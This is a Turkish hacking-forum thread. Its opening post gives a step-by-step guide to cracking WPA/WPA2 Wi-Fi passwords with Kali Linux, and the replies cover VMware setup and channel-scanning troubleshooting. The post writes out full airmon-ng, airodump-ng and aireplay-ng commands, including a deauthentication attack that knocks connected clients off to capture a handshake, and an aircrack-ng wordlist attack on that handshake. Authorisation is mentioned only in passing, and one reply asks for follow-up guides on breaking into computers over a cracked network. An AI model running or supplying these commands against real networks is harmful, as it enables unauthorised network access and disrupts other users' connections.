Kali Linux & Aircrack-ng ile WPA / WPA2 Wifi Şifre Kırma

mhmtonur

Üye
14 Mar 2013
145
0
Antalya
Kali Linux birçok şey için kullanılabilir, ancak muhtemelen WPA ve WPA2 ağlarına sızma testi veya "hack" yeteneği ile bilinir. WPA'yı hackleyebileceklerini iddia eden yüzlerce Windows uygulaması var; onları anlamayın! Onlar sadece profesyonel hackerlar tarafından, acemi veya özenti korsanların kendilerini hacklenmeye çekmek için kullandıkları dolandırıcılıktır. Bilgisayar korsanlarının ağınıza girmesinin tek bir yolu vardır ve bu Linux tabanlı bir işletim sistemi, monitör modu yapabilen bir kablosuz kart ve aircrack-ng veya benzeri bir yöntemdir. Ayrıca, bu araçlarla bile, Wi-Fi çatlamanın yeni başlayanlar için olmadığını unutmayın. Bununla oynamak için WPA kimlik doğrulamasının nasıl çalıştığı hakkında temel bilgi ve Kali Linux ve araçlarına ılımlı aşinalık gerekir. Gerekli becerilere sahip olduğunuzu düşünüyorsanız, başlayalım:

Step-1_thumb1.png

Tüm kablosuz ağlardan bağlantıyı kesin, bir Terminal açın ve airmon-ng yazın

Step-3_thumb1.png

Bu, monitör (enjeksiyon değil) modunu destekleyen tüm kablosuz kartları listeler. Listede kart yoksa, bağdaştırıcıyı çıkarıp yeniden takmayı deneyin (kullanıyorsanız) ve monitör modunu desteklediğinden emin olun. Harici bir adaptör kullanmıyorsanız ve hala listelenen bir şey görmüyorsanız, kartınız monitör modunu desteklemez ve harici bir adaptör satın almanız gerekir (gereksinimlerdeki bağlantıya bakın). Burada kartımın monitör modunu desteklediğini ve wlan0 olarak listelendiğini görebilirsiniz.

airmon-ng start yazın ve ardından kablosuz kartınızın arabirim adını yazın. benimki wlan0, yani benim komutum: airmon-ng start wlan0

Step-4_thumb1.png

Airodump-ng yazın ve ardından muhtemelen mon0 olan yeni monitör arabiriminin adını yazın.

Step-5_thumb1.png

Airodump şimdi bölgenizdeki tüm kablosuz ağları ve bunlar hakkında birçok yararlı bilgiyi listeleyecektir. Ağınızı veya sızma testine izin verdiğiniz ağı bulun. Ağınızı her zamanki gibi listeledikten sonra, işlemi durdurmak için klavyenizdeki Ctrl + C tuşlarına basın. Hedef ağınızın kanalını not edin.

step-6_thumb2.png

Hedef ağın BSSID'sini kopyalayın

Step-7_thumb2.png

airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

image_thumb25255B925255D.png

Airodump-ng'yi çalışır durumda bırakın ve ikinci bir terminal açın. Bu terminalde şu komutu yazın:
aireplay-ng –0 2 –a [yönlendirici bssid] –c [istemci bssid] mon0
–0, deauth modu için bir kısayoldur ve 2, gönderilecek deauth paketlerinin sayısıdır.
-a erişim noktasını / yönlendiricinin BSSID'sini belirtir, [yönlendirici bssid] 'i hedef ağın BSSID'si ile değiştirir, bu durumda benim durumumda 00: 14: BF: E0: E8: D5.
-c, önceki resimde not edildiği gibi, yetkilendirmeye çalıştığımız cihaz olan müşterinin BSSID'sini belirtir. [İstemci bssid] 'i bağlı istemcinin BSSID'si ile değiştirin, bu “STATION” altında listelenir.
Ve elbette, mon0 sadece monitör arayüzü anlamına gelir, sizinkinden farklıysa değiştirin.

Komutumun tamamı şöyle:
aireplay-ng –0 2 –a 00: 14: BF: E0: E8: D5 –c 4C: EB: 42: 59: DE: 31 mon0

step-10_thumb2.png

Bu, bu öğreticinin dış kısmını tamamlar. Şu andan itibaren, işlem tamamen bilgisayarınız ile Masaüstünüzdeki bu dört dosya arasındadır. Aslında, bu .cap olanı, önemli. Yeni bir Terminal açın ve şu komutu yazın:
aircrack-ng -a2 -b [yönlendirici bssid] -w [kelime listesine giden yol] /root/Desktop/*.cap

-a, aircrack'ın el sıkışmasını kırmak için kullanacağı yöntemdir, 2 = WPA yöntemi.
-b bssid anlamına gelir, [yönlendirici bssid] 'i hedef yönlendiricinin BSSID'si ile değiştirin, benimki 00: 14: BF: E0: E8: D5.
-w, wordlist anlamına gelir, [wordlist yolu] indirdiğiniz bir wordlist yolu ile değiştirin. Kök klasörde “wpa.txt” adlı bir kelime listem var.
/root/Desktop/*.cap, parolayı içeren .cap dosyasının yoludur. * Linux'ta joker karakter anlamına gelir ve Masaüstünüzde başka .cap dosyası olmadığını varsaydığım için, bu durumun düzgün çalışması gerekir.

Komutumun tamamı şöyle:
aircrack-ng –a2 –b 00: 14: BF: E0: E8: D5 –w /root/wpa.txt /root/Desktop/*.cap

image_thumb25255B525255D.png

Moderatör tarafında düzenlendi:

mhmtonur

Üye
14 Mar 2013
145
0
Antalya
Kesin Çözüm Alacaksın Kardeşim Tek Sorun Uzun Sürebiliyor Maximum 24 Saat Sabır Sadece Ama Kesin Çözüm Alıcaksın

mhmtonur

Üye
14 Mar 2013
145
0
Antalya
Sen İstersn İşini Şansa Bırakıp WordListlerle Atack Yaparak Kırck Diye Beklersn O WordList Zaten Büyük İhtimalle Kndi Hazırladıgın Wordlisttir Onunda Kırması İçin O Şifrenini Onun İçinde Olması Lazımdır O Şifre Zaten Orada Varsa Ne Gerek Var Ben Sana WordListsiz Ama Ksn Bir Çözümle Seçenek Sunuyorum Hiçmi Bilgisayarın Günlerce Acık Kalmadı Wmwareye Kur Başlat Pcni Kapatma Hepsi Bu Sn Windowsda Naparsan Yap

spacesyng

Yeni üye
2 Şub 2011
5
0
Sen İstersn İşini Şansa Bırakıp WordListlerle Atack Yaparak Kırck Diye Beklersn O WordList Zaten Büyük İhtimalle Kndi Hazırladıgın Wordlisttir Onunda Kırması İçin O Şifrenini Onun İçinde Olması Lazımdır O Şifre Zaten Orada Varsa Ne Gerek Var Ben Sana WordListsiz Ama Ksn Bir Çözümle Seçenek Sunuyorum Hiçmi Bilgisayarın Günlerce Acık Kalmadı Wmwareye Kur Başlat Pcni Kapatma Hepsi Bu Sn Windowsda Naparsan Yap

VMWare den wifi kartını nasıl ekleyebilirim. laptobın wifi kartı.

mhmtonur

Üye
14 Mar 2013
145
0
Antalya
Malesef Ubuntunun belirttigi bazı ağ kartları hariç digerlerini görmüyor bildigim destekleyenlerdn biriyse realtek diye blyrm 1 tane daha var arastır onuda lakin verim alamazsn ondan en iyisi driverini destekleyen bi kart markası bulup harici al

DELETE16

Yeni üye
5 Kas 2010
12
0
Tesekkurler guzel bi anlatimdi .kirilan wifi uzerinden pc ye baglanma paylasimlarinizin devamini bekliyorum

spacesyng

Yeni üye
2 Şub 2011
5
0
Sizin çektiğiniz resimlerde 6. kanala kadar sayıp devam etmiş ben başlattığımda 14. kanala kadar sayıyor sonra bekleyip bir daha başlıyor

mhmtonur

Üye
14 Mar 2013
145
0
Antalya
Sizin çektiğiniz resimlerde 6. kanala kadar sayıp devam etmiş ben başlattığımda 14. kanala kadar sayıyor sonra bekleyip bir daha başlıyor

Bu sıkıntıyı bende yasadım bunun için modeme yakın yüzde 60 la yüzde 80 de en az da 24 mbs lik bir hızda baglantı kalitesne sahip olması lazım eger 10dan fazla kişi baglıysa modeme sıkıntı yaratıyor bunlarıda göz önünde bulundurarak tekrar bi dene 24 mbsyi atıyorum anladın artık sn onu

spacesyng

Yeni üye
2 Şub 2011
5
0
Bu sıkıntıyı bende yasadım bunun için modeme yakın yüzde 60 la yüzde 80 de en az da 24 mbs lik bir hızda baglantı kalitesne sahip olması lazım eger 10dan fazla kişi baglıysa modeme sıkıntı yaratıyor bunlarıda göz önünde bulundurarak tekrar bi dene 24 mbsyi atıyorum anladın artık sn onu

tamam çok saolun bu gece dener sonucu en kısa zamanda yazmaya çalışırım

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.